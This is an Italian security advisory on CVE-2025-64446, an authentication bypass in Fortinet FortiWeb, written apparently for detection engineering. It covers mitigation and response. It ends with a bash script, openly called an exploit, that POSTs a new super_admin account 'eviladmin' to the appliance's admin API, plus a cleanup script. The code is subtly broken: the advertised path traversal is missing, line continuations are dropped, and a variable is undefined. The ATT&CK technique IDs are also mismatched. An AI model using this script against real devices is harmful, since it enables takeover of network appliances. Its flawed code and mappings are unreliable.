Vulnerabilità di Bypass dell’Autenticazione Fortinet FortiWeb tramite Path Traversal (CVE-2025-64446)

Sommario

Una vulnerabilità critica di bypass dell’autenticazione recentemente divulgata in Fortinet FortiWeb, tracciata come CVE-2025-64446, consente ad attaccanti non autenticati di creare account amministrativi attraverso una richiesta di attraversamento di percorso appositamente creata. Secondo quanto riportato pubblicamente, la vulnerabilità è stata sfruttata attivamente da inizio ottobre 2025 ed è stata successivamente aggiunta ai cataloghi ufficiali delle minacce a causa della sua gravità. Uno sfruttamento riuscito fornisce il pieno controllo sull’apparecchio WAF interessato e può consentire agli autori delle minacce di spostarsi ulteriormente nelle reti interne. Le prime indagini su CVE-2025-64446 indicano che i tentativi di sfruttamento continuano a prendere di mira a scala i dispositivi FortiWeb esposti su Internet.

Analisi di CVE-2025-64446

CVE-2025-64446 interessa molteplici versioni di FortiWeb, permettendo agli attaccanti di inviare una richiesta HTTP POST dannosa appositamente creata al punto finale API. La sequenza di attraversamento delle directory consente l’accesso allo script CGI amministrativo responsabile della creazione utenti. Questo risulta in un nuovo account amministratore sul dispositivo, garantendo il controllo totale all’avversario. Poiché i dispositivi FortiWeb operano strettamente in congiunzione con altri prodotti Fortinet, questa vulnerabilità introduce un’esposizione più ampia dell’ecosistema, significando che un’intrusione riuscita potrebbe consentire agli attaccanti di muoversi lateralmente e compromettere ulteriori sistemi e servizi connessi. Gli attacchi osservati in precedenza su FortiWeb (compresa l’attività intorno a CVE-2025-25257) rafforzano la probabilità di un continuo bersagliamento.

Mitigazione

Fortinet ha rilasciato patch per tutte le versioni interessate. La mitigazione immediata di CVE-2025-64446 richiede l’aggiornamento alla versione più recente del prodotto fisso 8.0.2. Le mitigazioni consigliate includono la restrizione dell’accesso all’interfaccia di gestione agli indirizzi IP fidati o a una VPN, l’applicazione dell’MFA per l’accesso amministrativo, la rotazione delle credenziali per tutti gli account admin FortiWeb, il monitoraggio dell’attività API admin per eventi anomali di creazione utenti e la rimozione dell’esposizione HTTP/HTTPS della gestione da Internet pubblico. Le organizzazioni dovrebbero anche seguire le procedure interne di test delle patch per evitare interruzioni operative.

Risposta

I team di sicurezza dovrebbero confermare l’inventario delle versioni, applicare patch senza ritardi e disabilitare l’accesso alla gestione esterna se l’aggiornamento immediato non è possibile. Data la presenza attiva di tentativi di sfruttamento, è consigliabile migliorare il monitoraggio delle richieste POST sospette indirizzate al percorso API vulnerabile. Se gli account esistenti mostrano cambiamenti inaspettati, ruotare le credenziali e rivedere i log di audit con maggiore frequenza. Raccogliere gli IOC di CVE-2025-64446, rivedere i modelli di traffico e correlarli con le recenti attività di sfruttamento migliorerà la visibilità e ridurrà il rischio.

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre‑flight della Telemetria e della Linea Base deve essere passato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.

• Narrazione e Comandi dell’Attacco:

  1. Ricognizione (T1016.001): L’attaccante scopre l’IP pubblico del dispositivo FortiWeb attraverso l’intelligence open‑source.
  2. Raccolta delle Credenziali / Escalation dei Privilegi (T1567.004): Utilizzando il CVE‑2025‑64446 scoperto, l’attaccante crea un payload POST dannoso che genera un nuovo utente admin con pieni privilegi.
  3. Esecuzione: L’attaccante invia la richiesta creata via HTTPS, assicurando che la request_method sia POST e che la request_uri corrisponda esattamente a /api/v2.0/cmdb/system/admin.

• Script di Test di Regressione:

  #!/usr/bin/env bash
  # Exploit CVE-2025-64446 per creare un nuovo account admin FortiWeb
  # Regola le variabili secondo necessità per l'ambiente target
  
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin"
  NEW_USER="eviladmin"
  NEW_PASS="P@ssw0rd!2025"
  # L'API vulnerabile non richiede autenticazione per questo endpoint (come da CVE)
  PAYLOAD=$(cat <<EOF
  {
      "name": "${NEW_USER}",
      "password": "${NEW_PASS}",
      "privilege": "super_admin"
  }
  EOF
  )
  
  echo "[*] Invio del POST dannoso a ${TARGET}${ENDPOINT}"
  curl -k -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -d "${PAYLOAD}" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] Simulazione dell'attacco completata."

• Comandi di Pulizia:

  #!/usr/bin/env bash
  # Rimuovi l'account admin dannoso creato durante il test
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"
  
  echo "[*] Eliminazione dell'account admin di test ${NEW_USER}"
  curl -k -X DELETE "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] Pulizia completata."